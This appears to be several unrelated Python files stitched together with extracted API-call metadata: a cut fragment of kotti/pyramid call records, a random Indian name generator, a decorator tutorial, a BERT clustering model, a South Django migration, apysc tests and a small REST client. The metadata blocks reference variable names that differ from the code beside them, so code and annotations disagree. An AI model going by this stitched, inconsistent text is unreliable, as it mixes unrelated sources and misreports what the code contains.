2059), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (2057, 2059), False, 'from kotti import get_settings\n'), ((5397, 5411), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (5409, 5411), False, 'from kotti import get_settings\n'), 
((13903, 13917), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (13915, 13917), False, 'from kotti import get_settings\n'), ((14442, 14461), 'kotti.resources.Content.title.asc', 'Content.title.asc', ([], {}), '()\n', (14459, 14461), False, 'from kotti.resources import Content\n'), ((5090, 5114), 'pyramid.renderers.get_renderer', 'get_renderer', (['asset_spec'], {}), '(asset_spec)\n', (5102, 5114), False, 'from pyramid.renderers import get_renderer\n'), ((14367, 14391), 'kotti.DBSession.query', 'DBSession.query', (['Content'], {}), '(Content)\n', (14382, 14391), False, 'from kotti import DBSession\n'), ((15503, 15527), 'kotti.resources.Tag.title.like', 'Tag.title.like', (['tag_term'], {}), '(tag_term)\n', (15517, 15527), False, 'from kotti.resources import Tag\n'), ((15407, 15431), 'kotti.DBSession.query', 'DBSession.query', (['Content'], {}), '(Content)\n', (15422, 15431), False, 'from kotti import DBSession\n')]
|
import random
#Punjabi
#-----
# Punjabi name stems and gendered suffixes; names are composed as
# stem + suffix by the helper functions below.
mainNamePunjabi=["Gagan", "Har", "Bal", "Man", "Nav", "Sukh", "Kush", "Gur", "Karam", "Karan", "Dil", "Dharam", "Param", "Dal", "Jas", "Par", "Dul"]
maleSuffixPunjabi=["jeet", "jyot", "vinder", "preet", "meet"]
# NOTE(review): this name is misspelled ("femle"); keep any references in
# sync if it is ever renamed.
femleSuffixPunjabi=["preet", "jeet", "bir"]
unionSuffixPunjabi=maleSuffixPunjabi+femleSuffixPunjabi
def randomPunjabi():
    """Return a random Punjabi name (stem + suffix of either gender)."""
    return random.choice(mainNamePunjabi) + random.choice(unionSuffixPunjabi)
def malePunjabi():
    """Return a random male Punjabi name (stem + male suffix)."""
    return random.choice(mainNamePunjabi) + random.choice(maleSuffixPunjabi)
def femalePunjabi():
    """Return a random female Punjabi name (stem + female suffix).

    Bug fix: the module-level list is spelled ``femleSuffixPunjabi`` (sic);
    the original body referenced a non-existent ``femaleSuffixPunjabi`` and
    raised NameError on every call.
    """
    namePunjabi = random.choice(mainNamePunjabi) + random.choice(femleSuffixPunjabi)
    return namePunjabi
#-----
#Marathi
#-----
# Marathi given-name pools (male/female) and their union, used by the
# random/male/femaleMarathi helpers below.
maleNameMarathi=["Aarav", "Kshitij", "Shantanu", "Onkar", "Aniket", "Atharva", "Prajwal", "Yash", "Abhijeet", "Ganesh", "Sachin", "Prathamesh", "Vaibhav", "Ninad", "Mihir", "Tejas", "Suyash", "Sanket", "Devang", "Darshan", "Soham", "Rohit", "Manish", "Aadesh", "Siddhesh",
"Aakash", "Anmol", "Chaitanya", "Dharmesh", "Gagan", "Gaurav", "Gopal", "Ishan", "Mehul", "Om", "Rahul", "Sandesh", "Tanmay", "Tushar", "Utkarsh",
"Vedang", "Varun", "Vinay", "Vivek", "Yogesh"]
femaleNameMarathi=["Vaishnavi", "Maithili", "Pooja", "Smital", "Shivani", "Veerja", "Shruti", "Aditi", "Manali", "Anuja", "Pranali", "Saloni",
"Aabha", "Aakriti", "Aruni", "Akanksha", "Akshata", "Aboli", "Ankita", "Chaitrali", "Divya", "Dhriti", "Gargi", "Gayatri", "Gauravi", "Gautami", "Isha", "Ishika",
"Kajal", "Kalyani", "Neha", "Nishi", "Tanvi", "Yuti"]
unionNameMarathi=maleNameMarathi+femaleNameMarathi
def randomMarathi():
    """Return a random Marathi name of either gender."""
    return random.choice(unionNameMarathi)
def maleMarathi():
    """Return a random male Marathi name.

    Bug fix: the original referenced ``maleNameMarath`` (missing the final
    'i'), a name that does not exist, so every call raised NameError.
    """
    return random.choice(maleNameMarathi)
def femaleMarathi():
    """Return a random female Marathi name.

    Bug fix: the original referenced ``femaleNameMarath`` (missing the final
    'i'), a name that does not exist, so every call raised NameError.
    """
    return random.choice(femaleNameMarathi)
#-----
#Bengali
#-----
# Bengali given-name pools (male/female) and their union.
maleNameBengali=["Abhik", "Abhoy", "Achintya", "Arnab", "Benoy", "Bhaskor",
"Bipin", "Daiwik", "Debesh", "Hrishab", "Indroneel", "Palash", "Paritosh", "Shirshendu", "Shubhang",
"Sourav", "Subrata", "Tapan", "Gairik", "Ujjwal"]
femaleNameBengali=["Ankolika", "Arundhati", "Bidisha", "Bibhuti", "Bipasha", "Chaitali", "Debjani", "Debolina", "Drishti", "Durba", "Joyeeta", "Kajol", "Kshamya", "Indrani", "Lotika", "Mishti",
"Naisha", "Pakhi", "Paromita", "Piyali", "Sagarika", "Shorbari", "Shoma", "Sushmita", "Tavishi", "Tvisha", "Yoshita"]
unionNameBengali=maleNameBengali+femaleNameBengali
def randomBengali():
    """Return a random Bengali name of either gender."""
    return random.choice(unionNameBengali)
def maleBengali():
    """Return a random male Bengali given name."""
    return random.choice(maleNameBengali)
def femaleBengali():
    """Return a random female Bengali given name."""
    return random.choice(femaleNameBengali)
#-----
#Gujarati
#-----
# Gujarati given-name pools (male/female) and their union.
maleNameGujarati=["Dhaval", "Haanish", "Herik", "Jigar", "Jignesh", "Joshil", "Mukund", "Munjal", "Oresh", "Prakat", "Pratul",
"Praful", "Praveen", "Prerit", "Devang", "Pujesh", "Raghubeer", "Sanam", "Yaksh", "Ahem", "Yug", "Yuvan", "Ronak"]
femaleNameGujarati=["Hinal", "Hiral", "Havya", "Jaimini", "Komal", "Jigna", "Raashi", "Kavya", "Nutan", "Pranauthi", "Puruvi",
"Tanishka", "Vaishnavi", "Vanshi", "Vrishti", "Vritika", "Kanchan"]
unionNameGujarati=maleNameGujarati+femaleNameGujarati
def randomGujarati():
    """Return a random Gujarati name of either gender."""
    return random.choice(unionNameGujarati)
def maleGujarati():
    """Return a random male Gujarati given name."""
    return random.choice(maleNameGujarati)
def femaleGujarati():
    """Return a random female Gujarati given name."""
    return random.choice(femaleNameGujarati)
#-----
#Kannada
#-----
# Kannada given-name pools (male/female) plus a shared surname pool; the
# helpers below compose "given surname" full names.
maleNameKannada=["Shreyas","Ganesh","Rishab","Ritvik","Ramesh","Abhhishek","Nandan","Kishen","Narayan","Aniket","Pawan","Hanumappa","Shiva","Rajath","Prateek","Prajwal","Ujval","Utaam","Mohit","Chetan","Dheeraj","Somshekar","Mahesh","Mallikarjun","Tony","Sukesh","Varun","Nikhil","Vasant","Deepak","Vasudev","Subrmanya","Vinay","hrihari","Santosh","Darshan","Vikshit","Amogh","Govind","Vittal","Jagganath","Shishir","Guru","Girish","Vikunt","Keshaw","Arya","Rahul","Rajesh","Shashidar","Venktash","Raman","Dhanush","Arjun","Karana","Kubera"]
femaleNameKannada=["Rachana","Divya","Renuka","Deeksha","Arpita","Ambruta","Bharathi","Seema","Shantala","Shoba","Kaveri","Priya","Prabha","Saraswati","Yeshaswini","Tejaswini","Sindhu","Ramya","Radhika","Shreya","Sameeksha","Chandana","Ganga","Meera","Nayana","Parvati","Shambavi","Sumana","Sridevi","Rishitha","Sneha","Vidya","Vaishanavi","Geetha","Veena","Kavita","Kavya","Kavana","Keerthi","Lavanya","Vandita","Vinuta","Aishwarya","Soundarya","Ananya","Samveetha","Bhavya","Bhagya","Girija","Gayatri","Anu","Dhanya","Krutika","Anjali"]
surnameKannada = ["Shenoy","Bhat","Pai","Kini","Hegede","Patil","Kotambri","Reddy","Rai","Shetty","Rao","Menasinkai","Ullagaddi" ,"Limbekai", "Ballolli", "Tenginkai", "Byali","Akki", "Doddamani", "Hadimani" , "Kattimani", "Bevinmarad", "Hunasimarad" , "Mirjankar", "Belagavi", "Hublikar" ,"Jamkhandi","Angadi", "Amavasya", "Kage", "Bandi", "Kuri", "Kudari", "Toppige", "Beegadkai", "Pyati" ,"Hanagi" ,"Rotti","Hebbar","Ballal","Rai"]
def maleKannada():
    """Return a random male Kannada full name ("given surname")."""
    given = random.choice(maleNameKannada)
    family = random.choice(surnameKannada)
    return given + " " + family
def femaleKannada():
    """Return a random female Kannada full name ("given surname")."""
    given = random.choice(femaleNameKannada)
    family = random.choice(surnameKannada)
    return given + " " + family
#-----
|
[
"random.choice"
] |
[((1676, 1707), 'random.choice', 'random.choice', (['unionNameMarathi'], {}), '(unionNameMarathi)\n', (1689, 1707), False, 'import random\n'), ((1763, 1792), 'random.choice', 'random.choice', (['maleNameMarath'], {}), '(maleNameMarath)\n', (1776, 1792), False, 'import random\n'), ((1850, 1881), 'random.choice', 'random.choice', (['femaleNameMarath'], {}), '(femaleNameMarath)\n', (1863, 1881), False, 'import random\n'), ((2569, 2600), 'random.choice', 'random.choice', (['unionNameBengali'], {}), '(unionNameBengali)\n', (2582, 2600), False, 'import random\n'), ((2656, 2686), 'random.choice', 'random.choice', (['maleNameBengali'], {}), '(maleNameBengali)\n', (2669, 2686), False, 'import random\n'), ((2744, 2776), 'random.choice', 'random.choice', (['femaleNameBengali'], {}), '(femaleNameBengali)\n', (2757, 2776), False, 'import random\n'), ((3367, 3399), 'random.choice', 'random.choice', (['unionNameGujarati'], {}), '(unionNameGujarati)\n', (3380, 3399), False, 'import random\n'), ((3458, 3489), 'random.choice', 'random.choice', (['maleNameGujarati'], {}), '(maleNameGujarati)\n', (3471, 3489), False, 'import random\n'), ((3550, 3583), 'random.choice', 'random.choice', (['femaleNameGujarati'], {}), '(femaleNameGujarati)\n', (3563, 3583), False, 'import random\n'), ((393, 423), 'random.choice', 'random.choice', (['mainNamePunjabi'], {}), '(mainNamePunjabi)\n', (406, 423), False, 'import random\n'), ((424, 457), 'random.choice', 'random.choice', (['unionSuffixPunjabi'], {}), '(unionSuffixPunjabi)\n', (437, 457), False, 'import random\n'), ((513, 543), 'random.choice', 'random.choice', (['mainNamePunjabi'], {}), '(mainNamePunjabi)\n', (526, 543), False, 'import random\n'), ((544, 576), 'random.choice', 'random.choice', (['maleSuffixPunjabi'], {}), '(maleSuffixPunjabi)\n', (557, 576), False, 'import random\n'), ((634, 664), 'random.choice', 'random.choice', (['mainNamePunjabi'], {}), '(mainNamePunjabi)\n', (647, 664), False, 'import random\n'), ((665, 699), 
'random.choice', 'random.choice', (['femaleSuffixPunjabi'], {}), '(femaleSuffixPunjabi)\n', (678, 699), False, 'import random\n'), ((5225, 5254), 'random.choice', 'random.choice', (['surnameKannada'], {}), '(surnameKannada)\n', (5238, 5254), False, 'import random\n'), ((5351, 5380), 'random.choice', 'random.choice', (['surnameKannada'], {}), '(surnameKannada)\n', (5364, 5380), False, 'import random\n'), ((5188, 5218), 'random.choice', 'random.choice', (['maleNameKannada'], {}), '(maleNameKannada)\n', (5201, 5218), False, 'import random\n'), ((5312, 5344), 'random.choice', 'random.choice', (['femaleNameKannada'], {}), '(femaleNameKannada)\n', (5325, 5344), False, 'import random\n')]
|
def start_end_decorator(func):
    """Decorator that brackets every call to ``func`` with 'start'/'end' prints.

    Note: the returned wrapper takes no arguments and discards ``func``'s
    return value, exactly like the tutorial original.
    """
    def wrapped():
        print('start')
        func()
        print('end')
    return wrapped
@start_end_decorator # print_name = start_end_decorator(print_name)
def print_name():
    # Calling the decorated function prints 'start', 'serkan', 'end'.
    print('serkan')
print_name()
import functools
def sum_of_digits(func):
    """Decorator replacing ``func``'s return value with the sum of its digits.

    As in the original, a non-digit character in ``str(result)`` (e.g. the
    '-' of a negative number) raises ValueError.
    """
    @functools.wraps(func)
    def wrapped(*args, **kwargs):
        digits = str(func(*args, **kwargs))
        return sum(int(ch) for ch in digits)
    return wrapped
@sum_of_digits
def add_five(x):
    # Decorated: add_five(11) -> 16 -> 1 + 6 -> 7.
    return x + 5
x = add_five(11)
print(x)
print(help(add_five))  # functools.wraps preserved the original metadata
print(add_five.__name__)  # 'add_five', thanks to functools.wraps
# Decorator function arguments
def repeat(num_times):
    """Decorator factory: call the wrapped function ``num_times`` times and
    return the result of the last call."""
    def _decorator(func):
        @functools.wraps(func)
        def _wrapped(*args, **kwargs):
            for _ in range(num_times):
                outcome = func(*args, **kwargs)
            return outcome
        return _wrapped
    return _decorator
@repeat(num_times=3)
def greet(name):
    # Decorated: each call prints the greeting three times.
    print(f"Hello {name}")
greet('Alex')
# a decorator function that prints debug information about the wrapped function
def debug(func):
    """Print the call signature before, and the return value after, each call."""
    @functools.wraps(func)
    def traced(*args, **kwargs):
        pieces = [repr(a) for a in args]
        pieces += [f"{k}={v!r}" for k, v in kwargs.items()]
        signature = ", ".join(pieces)
        print(f"Calling {func.__name__}({signature})")
        result = func(*args, **kwargs)
        print(f"{func.__name__!r} returned {result!r}")
        return result
    return traced
def start_end_decorator_2(func):
    """Variant accepting arbitrary arguments; prints 'End' after the call.

    Note: the wrapper deliberately discards ``func``'s return value, as in
    the original tutorial code.
    """
    def inner(*args, **kwargs):
        func(*args, **kwargs)
        print('End')
    return inner
@debug
@start_end_decorator_2
def say_hello(name):
    # Stacked decorators: debug wraps the start_end_decorator_2 wrapper.
    greeting = f'Hello {name}'
    print(greeting)
    return greeting
# now `debug` is executed first and calls `@start_end_decorator_2`, which then calls `say_hello`
say_hello(name='Alex')
import functools
class CountCalls:
    """Class-based decorator counting how often the wrapped function is called."""
    # the init needs to have the func as argument and stores it
    def __init__(self, func):
        functools.update_wrapper(self, func)
        self.func = func
        self.num_calls = 0
    # extend functionality, execute function, and return the result
    def __call__(self, *args, **kwargs):
        self.num_calls += 1
        print(f"Call {self.num_calls} of {self.func.__name__!r}")
        # Bug fix: the original never invoked the wrapped function (and
        # returned None), contradicting the comment above.
        return self.func(*args, **kwargs)
@CountCalls
def say_hello(num):
    # Rebinds say_hello to a CountCalls instance; num is unused in the body.
    print("Hello!")
say_hello(5)
say_hello(5)
|
[
"functools.update_wrapper",
"functools.wraps"
] |
[((303, 324), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (318, 324), False, 'import functools\n'), ((1184, 1205), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (1199, 1205), False, 'import functools\n'), ((768, 789), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (783, 789), False, 'import functools\n'), ((2121, 2157), 'functools.update_wrapper', 'functools.update_wrapper', (['self', 'func'], {}), '(self, func)\n', (2145, 2157), False, 'import functools\n')]
|
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved
Author: <NAME> (<EMAIL>)
Date: 02/26/2021
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
# from transformers import AutoModel, AutoTokenizer
class SCCLBert(nn.Module):
    """Supporting Clustering with Contrastive Learning (SCCL) model.

    Wraps a sentence-transformers BERT model with an instance-CL projection
    head and a learnable set of cluster centers used for soft cluster
    assignments via a Student's t kernel.
    """
    def __init__(self, bert_model, cluster_centers=None, alpha=1.0):
        """
        :param bert_model: sentence-transformers model; ``bert_model[0]``
            must expose ``tokenizer`` and ``auto_model``.
        :param cluster_centers: initial centers, shape
            ``(num_clusters, hidden_size)``.  NOTE(review): required in
            practice -- ``torch.tensor(None, ...)`` fails for the default.
        :param alpha: degrees of freedom of the Student's t-distribution.
        """
        super(SCCLBert, self).__init__()
        # (stray debug prints of the tokenizer / embedding size removed)
        self.tokenizer = bert_model[0].tokenizer
        self.sentbert = bert_model[0].auto_model
        self.emb_size = self.sentbert.config.hidden_size
        self.alpha = alpha
        # Instance-CL head
        self.head = nn.Sequential(
            nn.Linear(self.emb_size, self.emb_size),
            nn.ReLU(inplace=True),
            nn.Linear(self.emb_size, 128))
        # Clustering head
        initial_cluster_centers = torch.tensor(
            cluster_centers, dtype=torch.float, requires_grad=True)
        self.cluster_centers = Parameter(initial_cluster_centers)
    def get_embeddings(self, features, pooling="mean"):
        """Mean-pool token embeddings weighted by the attention mask.

        ``pooling`` is currently unused (only mean pooling is implemented).
        """
        bert_output = self.sentbert.forward(**features)
        attention_mask = features['attention_mask'].unsqueeze(-1)
        all_output = bert_output[0]
        mean_output = torch.sum(all_output*attention_mask, dim=1) / torch.sum(attention_mask, dim=1)
        return mean_output
    def get_cluster_prob(self, embeddings):
        """Soft cluster assignments via a Student's t kernel; rows sum to 1."""
        norm_squared = torch.sum((embeddings.unsqueeze(1) - self.cluster_centers) ** 2, 2)
        numerator = 1.0 / (1.0 + (norm_squared / self.alpha))
        power = float(self.alpha + 1) / 2
        numerator = numerator ** power
        return numerator / torch.sum(numerator, dim=1, keepdim=True)
    def local_consistency(self, embd0, embd1, embd2, criterion):
        """Sum of ``criterion`` losses between the anchor's cluster
        assignment and those of two augmented views."""
        p0 = self.get_cluster_prob(embd0)
        p1 = self.get_cluster_prob(embd1)
        p2 = self.get_cluster_prob(embd2)
        lds1 = criterion(p1, p0)
        lds2 = criterion(p2, p0)
        return lds1+lds2
|
[
"torch.nn.Parameter",
"torch.nn.ReLU",
"torch.nn.Linear",
"torch.sum",
"torch.tensor"
] |
[((912, 980), 'torch.tensor', 'torch.tensor', (['cluster_centers'], {'dtype': 'torch.float', 'requires_grad': '(True)'}), '(cluster_centers, dtype=torch.float, requires_grad=True)\n', (924, 980), False, 'import torch\n'), ((1025, 1059), 'torch.nn.Parameter', 'Parameter', (['initial_cluster_centers'], {}), '(initial_cluster_centers)\n', (1034, 1059), False, 'from torch.nn import Parameter\n'), ((733, 772), 'torch.nn.Linear', 'nn.Linear', (['self.emb_size', 'self.emb_size'], {}), '(self.emb_size, self.emb_size)\n', (742, 772), True, 'import torch.nn as nn\n'), ((786, 807), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (793, 807), True, 'import torch.nn as nn\n'), ((821, 850), 'torch.nn.Linear', 'nn.Linear', (['self.emb_size', '(128)'], {}), '(self.emb_size, 128)\n', (830, 850), True, 'import torch.nn as nn\n'), ((1297, 1342), 'torch.sum', 'torch.sum', (['(all_output * attention_mask)'], {'dim': '(1)'}), '(all_output * attention_mask, dim=1)\n', (1306, 1342), False, 'import torch\n'), ((1343, 1375), 'torch.sum', 'torch.sum', (['attention_mask'], {'dim': '(1)'}), '(attention_mask, dim=1)\n', (1352, 1375), False, 'import torch\n'), ((1709, 1750), 'torch.sum', 'torch.sum', (['numerator'], {'dim': '(1)', 'keepdim': '(True)'}), '(numerator, dim=1, keepdim=True)\n', (1718, 1750), False, 'import torch\n')]
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: creates (forwards) or drops (backwards) the
    'profiles_driveprofile' table.

    NOTE: South migrations are auto-generated; the `models` dict below is a
    frozen snapshot of the ORM at generation time and must not be edited by
    hand.
    """

    def forwards(self, orm):
        """Apply the migration: create the DriveProfile table and emit the
        post-create signal so South can track the new model."""
        # Adding model 'DriveProfile'
        db.create_table('profiles_driveprofile', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(unique=True, to=orm['auth.User'])),
            ('family_name', self.gf('django.db.models.fields.CharField')(max_length=50, blank=True)),
            ('given_name', self.gf('django.db.models.fields.CharField')(max_length=50, blank=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=101, blank=True)),
            ('gender', self.gf('django.db.models.fields.CharField')(max_length=10, blank=True)),
            ('email', self.gf('django.db.models.fields.EmailField')(max_length=75, blank=True)),
            ('verified_email', self.gf('django.db.models.fields.NullBooleanField')(null=True, blank=True)),
            ('locale', self.gf('django.db.models.fields.CharField')(max_length=5, blank=True)),
            ('google_id', self.gf('django.db.models.fields.CharField')(max_length=50, blank=True)),
            ('link', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
        ))
        db.send_create_signal('profiles', ['DriveProfile'])

    def backwards(self, orm):
        """Reverse the migration: drop the DriveProfile table."""
        # Deleting model 'DriveProfile'
        db.delete_table('profiles_driveprofile')

    # Frozen ORM state used by South to build `orm` for this migration
    # (auto-generated; includes referenced auth/contenttypes models).
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'blank': 'True', 'to': "orm['auth.Permission']"})
        },
        'auth.permission': {
            'Meta': {'object_name': 'Permission', 'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)"},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True', 'related_name': "'user_set'"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True', 'related_name': "'user_set'"}),
            'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
        },
        'contenttypes.contenttype': {
            'Meta': {'object_name': 'ContentType', 'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'profiles.driveprofile': {
            'Meta': {'object_name': 'DriveProfile'},
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'family_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'gender': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
            'given_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'google_id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'locale': ('django.db.models.fields.CharField', [], {'max_length': '5', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '101', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'unique': 'True', 'to': "orm['auth.User']"}),
            'verified_email': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
        },
        'profiles.gmailprofile': {
            'Meta': {'object_name': 'GmailProfile'},
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'family_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'gender': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
            'given_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'google_id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'locale': ('django.db.models.fields.CharField', [], {'max_length': '5', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '101', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'unique': 'True', 'to': "orm['auth.User']"}),
            'verified_email': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
        }
    }
    complete_apps = ['profiles']
|
[
"south.db.db.delete_table",
"south.db.db.send_create_signal"
] |
[((1426, 1477), 'south.db.db.send_create_signal', 'db.send_create_signal', (['"""profiles"""', "['DriveProfile']"], {}), "('profiles', ['DriveProfile'])\n", (1447, 1477), False, 'from south.db import db\n'), ((1558, 1598), 'south.db.db.delete_table', 'db.delete_table', (['"""profiles_driveprofile"""'], {}), "('profiles_driveprofile')\n", (1573, 1598), False, 'from south.db import db\n')]
|
from random import randint
from retrying import retry
import apysc as ap
from apysc._display.line_dot_setting import LineDotSetting
class TestLineDotSetting:
    """Unit tests for LineDotSetting: construction and dot_size access."""

    @retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
    def test___init__(self) -> None:
        # Plain int is wrapped into an ap.Int value object.
        created: LineDotSetting = LineDotSetting(dot_size=5)
        assert isinstance(created._value['dot_size'], ap.Int)
        assert created._value['dot_size'] == 5
        # An ap.Int is accepted directly as well.
        created = LineDotSetting(dot_size=ap.Int(10))
        assert created._value['dot_size'] == 10

    @retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
    def test_dot_size(self) -> None:
        created: LineDotSetting = LineDotSetting(dot_size=5)
        assert created.dot_size == 5
        assert isinstance(created.dot_size, ap.Int)
|
[
"apysc._display.line_dot_setting.LineDotSetting",
"random.randint",
"apysc.Int"
] |
[((315, 341), 'apysc._display.line_dot_setting.LineDotSetting', 'LineDotSetting', ([], {'dot_size': '(5)'}), '(dot_size=5)\n', (329, 341), False, 'from apysc._display.line_dot_setting import LineDotSetting\n'), ((704, 730), 'apysc._display.line_dot_setting.LineDotSetting', 'LineDotSetting', ([], {'dot_size': '(5)'}), '(dot_size=5)\n', (718, 730), False, 'from apysc._display.line_dot_setting import LineDotSetting\n'), ((223, 240), 'random.randint', 'randint', (['(10)', '(3000)'], {}), '(10, 3000)\n', (230, 240), False, 'from random import randint\n'), ((612, 629), 'random.randint', 'randint', (['(10)', '(3000)'], {}), '(10, 3000)\n', (619, 629), False, 'from random import randint\n'), ((498, 508), 'apysc.Int', 'ap.Int', (['(10)'], {}), '(10)\n', (504, 508), True, 'import apysc as ap\n')]
|
"""
Copyright (c) 2017 IBM Corp.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import requests
import json
from os import getenv
# API endpoint configuration and the access token read from the environment.
# Remote requests will fail without a valid TOKEN.
HOST= 'patchport-http.mybluemix.net'
VER = 'v0'
TOKEN = getenv("TOKEN")
if not TOKEN:
    print ("Set env variable TOKEN with the access token if you want to access the remote API.")
class Remote(object):
    """Base client for the patchport HTTP REST API.

    Subclasses model individual resources (CVE, Hunk, Build, ...) and use the
    `_request*` helpers; a subclass's `_postableFields` lists the attributes
    that may be serialized back to the server via `reprJSON`.
    """

    def __init__(self):
        self.APIurl = "https://%s/api/%s" % (HOST, VER)
        self.token = TOKEN

    def _requestPOST(self, path, data=None):
        """POST `data` (a JSON string) to `path`; raise on non-200, return parsed JSON."""
        headers = {'content-type': 'application/json'}
        u = "%s/%s?access_token=%s" % (self.APIurl, path, self.token)
        r = requests.post(u, data=data, headers=headers)
        if not r.status_code == 200:
            raise Exception('Error %d: %s\n%s' % (r.status_code, r.reason, u))
        return r.json()

    def _requestPATCH(self, path, data=None):
        """PATCH `data` (a JSON string) to `path`; raise on non-200, return parsed JSON."""
        headers = {'content-type': 'application/json'}
        u = "%s/%s?access_token=%s" % (self.APIurl, path, self.token)
        r = requests.patch(u, data=data, headers=headers)
        if not r.status_code == 200:
            raise Exception('Error %d: %s\n%s' % (r.status_code, r.reason, u))
        return r.json()

    def _requestDELETE(self, path):
        """DELETE `path`; raise on non-200, return parsed JSON."""
        u = "%s/%s?access_token=%s" % (self.APIurl, path, self.token)
        r = requests.delete(u)
        if not r.status_code == 200:
            raise Exception('Error %d: %s\n%s' % (r.status_code, r.reason, u))
        return r.json()

    def _requestGET(self, path, where=None, order=None, limit=None):
        """GET `path` with an optional loopback-style filter (where/order/limit)."""
        filter = {}
        if where:
            filter["where"] = where
        if order:
            filter["order"] = order
        if limit:
            filter["limit"] = limit
        u = "%s/%s?filter=%s&access_token=%s" % (self.APIurl, path, json.dumps(filter), self.token)
        r = requests.get(u)
        if not r.status_code == 200:
            raise Exception('Error %d: %s\n%s' % (r.status_code, r.reason, u))
        return r.json()

